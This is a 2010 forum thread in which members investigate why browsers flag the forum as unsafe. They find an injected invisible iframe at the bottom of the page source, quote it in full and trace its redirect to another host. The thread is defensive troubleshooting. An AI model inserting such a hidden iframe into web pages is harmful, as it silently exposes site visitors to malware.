Unsafe Site Again??

roclafamilia · Mar 23, 2010

I'm getting one of these again...anyone else?

mindcryme · Mar 23, 2010

i am too i'm on a mac

roclafamilia · Mar 23, 2010

Yeah, that's from safari...mac too.

nvanprooyen · Mar 23, 2010

nothing here yet...pc / firefox.

nvanprooyen · Mar 23, 2010

There aren't even any ads running (I'm not seeing them anyways). Wasn't the issue before an exploit on openx?

Lord B · Mar 23, 2010

Mac here, firefox. No issues like that. Let me try in Safari.

Edit: Working fine in Safari.

roclafamilia · Mar 23, 2010

I got the error in chromium too, but it doesn't appear to be happening now.

http://grab.by/3giA

iPwnNoobs · Mar 23, 2010

all your IPs are belong to wickedfire - thats probably just LP Lockdown doin its thing... nothing to worry bout... move along..

roclafamilia · Mar 23, 2010

nvanprooyen said:
There aren't even any ads running (I'm not seeing them anyways). Wasn't the issue before an exploit on openx?

At the bottom of the source there's this.

Code:

<iframe src="http://ads.fake-isp.com/stats?counter=43" width=0 height=0></iframe>

when I went to that directly, I got an unsafe warning, So i'm assuming that's it.

kblessinggr · Mar 23, 2010

I turned back on the warning, and nothing popped up for me yet (Safari, OSX)

kblessinggr · Mar 23, 2010

roclafamilia said:
At the bottom of the source there's this.

Code:

<iframe src="http://ads.fake-isp.com/stats?counter=43" width=0 height=0></iframe>

when I went to that directly, I got an unsafe warning, So i'm assuming that's it.

Oh you're talking bout that lil dot that shows up just above the copyright line near the bottom of the site.

btw when I goto hxxp://ads.fake-isp.com/stats?counter=43 it just redirects to hxxp://whendone.net/cgi-bin/ids.html

roclafamilia · Mar 23, 2010

That one...

Rage9 · Mar 23, 2010

Got infected already. Removed it.

gimmedat · Mar 23, 2010

NoScript FTW

Rage9 · Mar 23, 2010

NoScript now in effect.

kblessinggr · Mar 23, 2010

Rage9 said:
Got infected already. Removed it.

*infected* with what exactly? Is there still an internet explorer hole where simply viewing a site installs something onto your system?

ctdenike03 · Mar 23, 2010

I just got the same thing on chrome

kblessinggr · Mar 23, 2010

hehe "Welcome to nginx!" on whendone.net

Course not too surprising that a default install of a russian webserver would be on a server in Latvia (microlines.lv RDNS)

Sohan · Mar 23, 2010

http://ads.fake-isp.com/stats?counter=43 is what goes into the iframe.

roman8389 · Mar 23, 2010

Got an alert from Avast the last time I came, referencing whendone.net. Didn't happen this time.

Unsafe Site Again??

New member

walking on a canvas

New member

Fortes Fortuna Adiuvat

Fortes Fortuna Adiuvat

New member

New member

Banned

New member

PedoBeard

PedoBeard

New member

Banned

Global Dominance

Banned

PedoBeard

New member

PedoBeard

I'm a 'libtard'

Banned